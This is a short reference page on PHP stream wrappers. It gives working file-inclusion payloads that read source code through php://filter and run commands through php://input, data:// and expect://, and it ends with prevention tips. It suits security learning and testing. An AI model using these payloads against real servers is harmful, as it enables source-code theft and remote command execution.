PHP Wrappers

PHP Wrappers (Stream Wrappers) are protocols that extend PHP's file handling capabilities. When used with user input in file operations, they can enable arbitrary file reading, code execution, or server-side request forgery.

Common Wrappers

file://     - Local filesystem access
php://      - PHP I/O streams
data://     - Data as URL
http://     - HTTP requests
ftp://      - FTP access
zip://      - Compressed file access
phar://     - PHP Archive access
expect://   - Process interaction (if enabled)

Exploitation Examples

php://filter - Read Source Code

# Read and base64 encode PHP source
?page=php://filter/convert.base64-encode/resource=config.php

# Output: PD9waHAKJGRiX3Bhc3N3b3JkID0gInNlY3JldCI7Cj8+
# Decode to get: <?php $db_password = "secret"; ?>

php://input - Execute POST Data

# If include($_GET['page']) vulnerable:
GET ?page=php://input
POST body: <?php system('whoami'); ?>

# Executes the POST content as PHP

data:// - Inline Code Execution

?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

expect:// - Command Execution

# If expect wrapper enabled:
?page=expect://whoami

Prevention

• Never use user input in file operations
• Disable dangerous wrappers in php.ini
• Use allowlists for file paths
• Set allow_url_include = Off

See Also

• Local File Inclusion
• PHAR Deserialization
• Server-Side Request Forgery